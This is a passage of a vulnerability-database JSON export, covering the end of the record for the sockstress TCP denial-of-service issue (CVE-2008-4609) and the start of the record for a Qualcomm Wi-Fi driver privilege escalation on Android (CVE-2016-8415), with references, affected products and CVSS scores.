        "url": "http://www.seil.jp/seilseries/security/2009/a00667.php"
      },
      {
        "title": "267088",
        "trust": 0.8,
        "url": "http://jp.sunsolve.sun.com/search/document.do?assetkey=1-66-267088-1"
      },
      {
        "title": "MS09-048",
        "trust": 0.8,
        "url": "http://www.microsoft.com/japan/technet/security/bulletin/ms09-048.mspx"
      },
      {
        "title": "MS09-048e",
        "trust": 0.8,
        "url": "http://www.microsoft.com/japan/security/bulletins/ms09-048e.mspx"
      },
      {
        "title": "JVNVU#943657",
        "trust": 0.8,
        "url": "http://software.fujitsu.com/jp/security/vulnerabilities/vu943657.html"
      },
      {
        "title": "TA09-251A",
        "trust": 0.8,
        "url": "http://software.fujitsu.com/jp/security/vulnerabilities/ta09-251a.html"
      },
      {
        "title": "Symantec Security Advisories: SA38: Blue Coat ProxyAV Advisory on Sockstress TCP Attacks",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=fb80a5c8f4ca8d75f9df074d6d82e182"
      },
      {
        "title": "Cisco: TCP State Manipulation Denial of Service Vulnerabilities in Multiple Cisco Products",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20090908-tcp24"
      },
      {
        "title": "Symantec Security Advisories: SA41 : Blue Coat ProxySG Advisory on Sockstress TCP Attacks (CVE-2008-4609)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=d8370cc1d406e0cbe214c88e6d3d62d7"
      },
      {
        "title": "Symantec Security Advisories: SA34 : Blue Coat iShared Advisory on Sockstress TCP Attacks (CVE-2008-4609)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=85b57218eec77ee0396becd56404d8f1"
      },
      {
        "title": "Symantec Security Advisories: SA35 : Blue Coat Director Advisory on Sockstress TCP Attacks",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=7d4c01e5a8411a8e49f47e52a356544c"
      },
      {
        "title": "Symantec Security Advisories: SA39 : Blue Coat PacketShaper Advisory on Sockstress TCP Attacks",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=1ace87e00398301b8248ba77512ee922"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2008-4609 "
      },
      {
        "title": "sockstress",
        "trust": 0.1,
        "url": "https://github.com/marcelki/sockstress "
      },
      {
        "title": "awesome-network-stuff",
        "trust": 0.1,
        "url": "https://github.com/alphaseclab/awesome-network-stuff "
      },
      {
        "title": "awesome-network-stuff",
        "trust": 0.1,
        "url": "https://github.com/aniksarakash/awesome-network-stuff "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/cvedb/poc-list "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2008-4609"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-002090"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-16",
        "trust": 1.9
      },
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-noinfo",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-34734"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-002090"
      },
      {
        "db": "NVD",
        "id": "CVE-2008-4609"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.7,
        "url": "https://www.cert.fi/haavoittuvuudet/2008/tcp-vulnerabilities.html"
      },
      {
        "trust": 2.6,
        "url": "http://www.cpni.gov.uk/docs/tn-03-09-security-assessment-tcp.pdf"
      },
      {
        "trust": 2.6,
        "url": "http://www.us-cert.gov/cas/techalerts/ta09-251a.html"
      },
      {
        "trust": 2.1,
        "url": "http://blog.robertlee.name/2008/10/conjecture-speculation.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.cisco.com/en/us/products/products_security_response09186a0080a15120.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.cisco.com/en/us/products/products_security_advisory09186a0080af511d.shtml"
      },
      {
        "trust": 1.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2013:150"
      },
      {
        "trust": 1.8,
        "url": "http://insecure.org/stf/tcp-dos-attack-explained.html"
      },
      {
        "trust": 1.8,
        "url": "http://searchsecurity.techtarget.com.au/articles/27154-tcp-is-fundamentally-borked"
      },
      {
        "trust": 1.8,
        "url": "http://www.outpost24.com/news/news-2008-10-02.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.immunitysec.com/pipermail/dailydave/2008-october/005360.html"
      },
      {
        "trust": 1.8,
        "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-048"
      },
      {
        "trust": 1.8,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a6340"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=bugtraq\u0026m=125856010926699\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://tools.ietf.org/html/draft-ananth-tcpm-persist-01"
      },
      {
        "trust": 1.6,
        "url": "http://www.securityfocus.com/archive/1/507953"
      },
      {
        "trust": 1.2,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms09-048.mspx"
      },
      {
        "trust": 1.2,
        "url": "http://www.kb.cert.org/vuls/id/723308"
      },
      {
        "trust": 1.1,
        "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-267088-1"
      },
      {
        "trust": 0.8,
        "url": "http://tools.ietf.org/html/rfc1122#page-92"
      },
      {
        "trust": 0.8,
        "url": "http://tools.ietf.org/html/draft-mahesh-persist-timeout-02"
      },
      {
        "trust": 0.8,
        "url": "http://shlang.com/netkill/"
      },
      {
        "trust": 0.8,
        "url": "http://www.netasq.com/en/threats/sockstress.php"
      },
      {
        "trust": 0.8,
        "url": "http://www.phrack.org/issues.html?issue=66\u0026id=9#article"
      },
      {
        "trust": 0.8,
        "url": "http://isc.sans.org/diary.html?storyid=5104"
      },
      {
        "trust": 0.8,
        "url": "http://www.t2.fi/2008/08/27/jack-c-louis-and-robert-e-lee-to-talk-about-new-dos-attack-vectors/"
      },
      {
        "trust": 0.8,
        "url": "http://www.darkreading.com/blog.asp?blog_sectionid=403\u0026doc_id=164939\u0026wt.svl=tease2_2"
      },
      {
        "trust": 0.8,
        "url": "http://www.ietf.org/mail-archive/web/tcpm/current/msg04040.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.ietf.org/mail-archive/web/tcpm/current/msg03826.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.ietf.org/mail-archive/web/tcpm/current/msg03503.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.ietf.org/mail-archive/web/tcpm/current/msg02870.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.ietf.org/mail-archive/web/tcpm/current/msg02557.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.ietf.org/mail-archive/web/tcpm/current/msg02189.html"
      },
      {
        "trust": 0.8,
        "url": "http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.31.y.git;a=blob;f=net/ipv4/tcp_timer.c;h=b144a26359bcf34a4b0606e171f97dc709afdfbb;hb=120f68c426e746771e8c09736c0f753822ff3f52#l233"
      },
      {
        "trust": 0.8,
        "url": "http://sla.ckers.org/forum/read.php?14,27324"
      },
      {
        "trust": 0.8,
        "url": "http://www.checkpoint.com/defense/advisories/public/announcement/090809-tcpip-dos-sockstress.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/archive/1/archive/1/506331/100/0/"
      },
      {
        "trust": 0.8,
        "url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=\u0026solutionid=sk42725"
      },
      {
        "trust": 0.8,
        "url": "http://kbase.redhat.com/faq/docs/doc-21623"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-4609"
      },
      {
        "trust": 0.8,
        "url": "http://www.cpni.gov.uk/products/technicalnotes/feb-09-security-assessment-tcp.aspx"
      },
      {
        "trust": 0.8,
        "url": "http://tools.ietf.org/html/rfc793"
      },
      {
        "trust": 0.8,
        "url": "http://www.ipa.go.jp/security/vuln/vuln_tcpip.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.jpcert.or.jp/at/2009/at090019.txt"
      },
      {
        "trust": 0.8,
        "url": "http://www.jpcert.or.jp/at/2009/at090018.txt"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnvu943657/index.html"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnta09-251a/"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/tr/jvntr-2009-22"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-4609"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/36802"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/37044/"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/36597"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/36603"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/36602"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/31545"
      },
      {
        "trust": 0.8,
        "url": "http://www.us-cert.gov/cas/alerts/sa09-251a.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.vupen.com/english/advisories/2009/2567"
      },
      {
        "trust": 0.8,
        "url": "http://www.vupen.com/english/advisories/2009/2954"
      },
      {
        "trust": 0.8,
        "url": "http://www.cyberpolice.go.jp/#topics"
      },
      {
        "trust": 0.3,
        "url": "http://blogs.technet.com/srd/archive/2009/09/08/assessing-the-risk-of-the-september-critical-security-bulletins.aspx"
      },
      {
        "trust": 0.3,
        "url": "http://blogs.technet.com/srd/archive/2009/09/08/ms09-048-tcp-ip-vulnerabilities.aspx"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/504375"
      },
      {
        "trust": 0.3,
        "url": "http://support.nortel.com/go/main.jsp?cscat=bltndetail\u0026documentoid=971633\u0026poid="
      },
      {
        "trust": 0.3,
        "url": "http://www.rtpro.yamaha.co.jp/rt/faq/security/vu943657.html"
      },
      {
        "trust": 0.3,
        "url": "http://support.avaya.com/css/p8/documents/100065311"
      },
      {
        "trust": 0.3,
        "url": "http://support.avaya.com/css/p8/documents/100065799"
      },
      {
        "trust": 0.3,
        "url": "http://www.cisco.com/warp/public/707/cisco-sa-20090908-tcp24.shtml"
      },
      {
        "trust": 0.3,
        "url": "http://www.cisco.com/warp/public/707/cisco-sr-20081017-tcp.shtml"
      },
      {
        "trust": 0.3,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=kb66963"
      },
      {
        "trust": 0.3,
        "url": "http://support.citrix.com/article/ctx123649"
      },
      {
        "trust": 0.3,
        "url": "http://www11.itrc.hp.com/service/cki/docdisplay.do?doclocale=en\u0026docid=emr_na-c01923093-1"
      },
      {
        "trust": 0.3,
        "url": "http://support.nortel.com/go/main.jsp?cscat=bltndetail\u0026id=962027"
      },
      {
        "trust": 0.3,
        "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa36"
      },
      {
        "trust": 0.3,
        "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa37"
      },
      {
        "trust": 0.3,
        "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa35"
      },
      {
        "trust": 0.3,
        "url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=\u0026solutionid=sk42723"
      },
      {
        "trust": 0.3,
        "url": "https://support.f5.com/kb/en-us/solutions/public/10000/500/sol10509.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.stonesoft.com/en/support/security_advisories/2009_17_09.html"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=bugtraq\u0026amp;m=125856010926699\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/16.html"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2008-4609"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/marcelki/sockstress"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20090908-tcp24"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/business_solutions/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/36597/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-4609"
      },
      {
        "trust": 0.1,
        "url": "http://www.itrc.hp.com/service/cki/secbullarchive.do"
      },
      {
        "trust": 0.1,
        "url": "http://www.hp.com"
      },
      {
        "trust": 0.1,
        "url": "http://h30046.www3.hp.com/driveralertprofile.php?regioncode=na\u0026langcode=useng\u0026jumpid=in_sc-gen__driveritrc\u0026topiccode=itrc"
      },
      {
        "trust": 0.1,
        "url": "http://h30046.www3.hp.com/subsignin.php"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#723308"
      },
      {
        "db": "VULHUB",
        "id": "VHN-34734"
      },
      {
        "db": "VULMON",
        "id": "CVE-2008-4609"
      },
      {
        "db": "BID",
        "id": "31545"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-002090"
      },
      {
        "db": "PACKETSTORM",
        "id": "81054"
      },
      {
        "db": "PACKETSTORM",
        "id": "82772"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200810-307"
      },
      {
        "db": "NVD",
        "id": "CVE-2008-4609"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#723308"
      },
      {
        "db": "VULHUB",
        "id": "VHN-34734"
      },
      {
        "db": "VULMON",
        "id": "CVE-2008-4609"
      },
      {
        "db": "BID",
        "id": "31545"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-002090"
      },
      {
        "db": "PACKETSTORM",
        "id": "81054"
      },
      {
        "db": "PACKETSTORM",
        "id": "82772"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200810-307"
      },
      {
        "db": "NVD",
        "id": "CVE-2008-4609"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2009-11-23T00:00:00",
        "db": "CERT/CC",
        "id": "VU#723308"
      },
      {
        "date": "2008-10-20T00:00:00",
        "db": "VULHUB",
        "id": "VHN-34734"
      },
      {
        "date": "2008-10-20T00:00:00",
        "db": "VULMON",
        "id": "CVE-2008-4609"
      },
      {
        "date": "2008-10-02T00:00:00",
        "db": "BID",
        "id": "31545"
      },
      {
        "date": "2009-10-14T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2009-002090"
      },
      {
        "date": "2009-09-09T16:34:28",
        "db": "PACKETSTORM",
        "id": "81054"
      },
      {
        "date": "2009-11-18T16:25:02",
        "db": "PACKETSTORM",
        "id": "82772"
      },
      {
        "date": "2008-10-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200810-307"
      },
      {
        "date": "2008-10-20T17:59:26.163000",
        "db": "NVD",
        "id": "CVE-2008-4609"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-02-13T00:00:00",
        "db": "CERT/CC",
        "id": "VU#723308"
      },
      {
        "date": "2022-12-14T00:00:00",
        "db": "VULHUB",
        "id": "VHN-34734"
      },
      {
        "date": "2022-12-14T00:00:00",
        "db": "VULMON",
        "id": "CVE-2008-4609"
      },
      {
        "date": "2012-07-30T20:21:00",
        "db": "BID",
        "id": "31545"
      },
      {
        "date": "2012-07-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2009-002090"
      },
      {
        "date": "2019-05-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200810-307"
      },
      {
        "date": "2022-12-14T16:40:36.253000",
        "db": "NVD",
        "id": "CVE-2008-4609"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200810-307"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "TCP may keep its offered receive window closed indefinitely (RFC 1122)",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#723308"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "configuration error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200810-307"
      }
    ],
    "trust": 0.6
  }
}

var-201701-0092
Vulnerability from variot

An elevation of privilege vulnerability in the Qualcomm Wi-Fi driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-31750554. References: QC-CR#1079596. GoogleNexus is a high-end mobile phone series powered by Google\342\200\231s original Android system. Google Nexus is prone to a privilege-escalation vulnerability

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201701-0092",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "5x"
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel",
        "scope": null,
        "trust": 0.6,
        "vendor": "google",
        "version": null
      },
      {
        "model": "pixel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00185"
      },
      {
        "db": "BID",
        "id": "95260"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006750"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8415"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-026"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8415"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Hao Chen and Guang Gong of Alpha Team, Qihoo 360 Technology Co. Ltd.",
    "sources": [
      {
        "db": "BID",
        "id": "95260"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-026"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2016-8415",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.6,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2016-8415",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2017-00185",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.0,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2016-8415",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-8415",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-00185",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201701-026",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-8415",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00185"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8415"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006750"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8415"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-026"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in the Qualcomm Wi-Fi driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-31750554. References: QC-CR#1079596. GoogleNexus is a high-end mobile phone series powered by Google\\342\\200\\231s original Android system. Google Nexus is prone to a privilege-escalation vulnerability",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8415"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006750"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-00185"
      },
      {
        "db": "BID",
        "id": "95260"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8415"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-8415",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "95260",
        "trust": 2.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006750",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-00185",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-026",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8415",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00185"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8415"
      },
      {
        "db": "BID",
        "id": "95260"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006750"
      },
      {
